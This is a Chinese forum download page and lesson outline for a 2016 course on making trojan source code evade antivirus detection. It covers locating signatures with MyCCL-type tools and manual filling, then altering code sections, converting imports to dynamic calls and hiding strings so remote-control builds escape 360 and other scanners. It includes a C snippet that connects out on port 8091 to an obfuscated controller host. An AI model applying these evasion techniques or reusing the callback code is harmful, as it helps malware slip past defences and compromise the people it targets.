2016年小七免杀论坛源码免杀培训系列课程

教程詳情

文件下載	文件名稱：2016年小七免殺論壇源碼免殺培訓系列課程	文件大小：124.27MB
	下載聲明：本站文件大多來自于網絡，僅供學習和研究使用，不得用于商業用途，如有版權問題，請聯系博豬！
	下載地址：下載教程

教程目錄：
第一課【安裝工具以及虛拟機搭建】
本系列課程由淺入深講解以及實戰！因爲沒有麥不能語音了。教程都是從基本的開始操作，如果會了的，可以快進了，或者直接進入後面的教程。
1.安裝VC編譯軟件
我們在做源碼免殺之前都是必需一些常用的工具，比如VC編譯器等。下面我們先來安裝編譯器，安裝包我已經下載好了，大家可以自己百度下載即可，大家看操作，繼續，好了，VC6已經安裝好了，那麽接着就是更新SDK了，找到安裝目錄覆蓋，到這裏差不多完成了，還有一個就是安裝VC助手，這個可根據大家需要安裝吧。好了打開編譯器，這個就是界面了，我就不做多介紹了。
2.安裝虛拟機
這裏我就不演示了，大家可根據自己電腦配置安裝什麽版本的VM，百度搜索下就出來一堆了，建議大家安裝英文版的，因爲比較穩定，或者安裝最新的版本也行，不過需要安裝漢化包。
好了，我們的第一節就是說的這麽多，下節課我們就開始講免殺的一些基本的方法了。
下節課見!88

第二課【如何定位特征碼】
以下是一些常用的定位方法
myccl定位工具
multiCCL定位工具
手工定位
判斷定位
.text 代碼段
.rdata 輸入表
.data 字符串
.rsrc 資源
首先我們來看第一個吧，這裏就簡單介紹下就行，分塊數量自己定奪，一般不超過30吧，開始位置都是1000開頭，這裏我不建議1000，因爲殺毒軟件訂太緊了，所以大家可以多加點數字比如1011.1033等，其他的默認就行，然後就是開始定位了，生成出來一個文件，拖到殺毒軟件查殺，殺到那個文件直接删除然後再生成，反複定位到長度爲1，2.3的時候，特征碼的位置就出來了，有些可能會偏移幾個字節位置。

這兩個第一個是文件定位工具，第二個是内存定位工具，這裏不做多介紹了。
手工定位對于幹擾厲害的殺軟很有效，和判斷一起操作，時間會縮短些，我就演示給大家看下，這裏要說下判斷特征碼在什麽區段，我們一個個區段來填充，填充了那個不殺了就在那個區段，如果特征碼在代碼段，那麽我們用C32來定位，代碼的開始位置填充法，填充後再查殺，一直填充到不殺爲止，第二種方法就是直接用工具來定位了。先記錄下區段的位置，然後在工具的開始位置和結束位置填上。

其實定位的方法很多，大家也不一定按照我的方法去做，什麽方法快就用什麽方法。我給大家的隻是一些經驗和思路。

好了，這節課就到這裏，88

第三課【如何在源碼裏面查找特征碼位置】

這課簡單給大家講下如何查找特征碼，首先我們先編譯一下DAT的源碼，設置。産生MAP文件勾上，這樣我們就看到一個map文件了，那麽先說第一個吧。

代碼段的特征碼，我就随便找一處給大家演示，代碼的我們一般載入OD查看，這些就是入口位置了，我來找一處地方吧。這裏搜索到兩處地方，一般我們都是往上看的是在什麽代碼裏面，就是在這裏裏面了，我們再換一處看看，這裏有四處地方，這個就是代碼的查找。

輸入表函數的查找，載入C32查看，這裏就是輸入表的位置了，假如定位在這個函數上面WideCharToMultiByte，直接複制代碼裏面搜索即可，換一個，找到了，GetCurrentProcessId，其實對于函數的查找是很容易的。

字符串的查找，也是在C32裏面查看，這些就是字符串了，我們來搜索那個文字的，這些都是很容易找到的，一定要加雙斜杠，不然會搜索不到的，對把。

最後一個就是資源了，這些就是資源的代碼了。

一般我們在定位的時候資源我們都是先删除，不然會幹擾到定位的，而且會死循環。

好了，今天的課程就是這些了，如果大家有不懂的，可以論壇發帖提問。

下節課我們就講解對于特征碼的修改，也就是在源碼裏面如何修改。

第四課【代碼段的修改】
上節課我們講了如何查找特征碼，那麽這節課就講下代碼段的修改，我們來打開源碼。

我們對于代碼的修改最常用的手法也就幾種。

Sleep(0);
Sleep(0);
Sleep(0); 延遲0

加這個是不影響程序運行的。

再來看下try，卡住了用輔助工具來完成快點，

try
{
if(1+1==2)throw 15;
}
catch (...)
{
char chIP[128]={0},chPort[128]={0},*ip=NULL;
char Admin_Host[] = {'w','w','w','.','c','c','t','v','-','c','c','.','n','e','t','\0'};
struct sockaddr_in LocalAddr;
LocalAddr.sin_family=AF_INET;
LocalAddr.sin_port=htons(8091);
LocalAddr.sin_addr.S_un.S_addr=ResolvDNS(Admin_Host);

//連接的socket
SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);

if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
{
closesocket(MySocket);
return SOCKET_ERROR;
}
}

以上這段代碼已經是try的了，

還有一個就是加花指令的，nop；不過這個方法殺軟訂太緊了，對于360殺毒來說是沒有效的，其他的殺軟也就不是很清楚了，我們常用的也就是上面的兩種方法，編譯是沒問題的，那麽運行肯定也是沒問題的，電腦爛卡死了。
上線什麽的都是問題的。

第五課【輸入表函數的修改】

當我們定位到輸入表函數的時候，卻不知道怎麽去修改，那麽今天我們就來講解怎麽處理，

先打開源碼編譯一個DAT，用到的工具C32，還有源碼輔助工具，先載入C32查看特征碼位置，是定位到什麽函數上面了，比如我們定位在這個LoadLibraryA函數上面，那麽我們在源碼裏面搜索的時候，後面帶A的要去掉，不然是搜索不到的，看到了吧帶A是搜索不到的，這個是動态調用的函數，我們來換一個，GetModuleFileNameA

搜索到兩處，有一處已經是注銷掉的，不需要管了，我們來看下面那個。鼠标放在函數上，右鍵點擊轉到定義，我們把這個函數的定義複制下來，用到輔助工具來，點動态調用粘貼進去即可，點生成，複制下面的代碼，一般定義我們都是放在代碼的前面，然後複制那個函數替換掉原來的函數，這樣就算完成了，來編譯下，嗯，沒錯，我們在來看下這個函數是不是沒有了，OK，我們再來演示一個，RegOpenKeyA就這個了，ok，再來看看這個函數是不是被調用了，已經不見了。

好了今天就講這麽多，大家自己多多練習，不懂的論壇發帖吧。

第六課【字符串的修改】

這節課簡單的講下字符串的修改把，其實對于字符串的改法常用的也是幾種方法，那麽我們先來講第一種吧。

字符串的隐藏，大家看我操作，這些就是字符串了，我們來找一段給大家演示，Yow! Bad host lookup

找到兩個，我們來看下是不是隐藏了，沒有看到了是把。我們來換一個，這個不能隐藏。那些都不能隐藏的，

字符串的連接，剛才漏掉了前面的，ok，再來看看，好了。

字符串的修改常用的兩種改法，我就給大家演示這麽多了，如果大家有什麽不懂的，論壇發帖吧。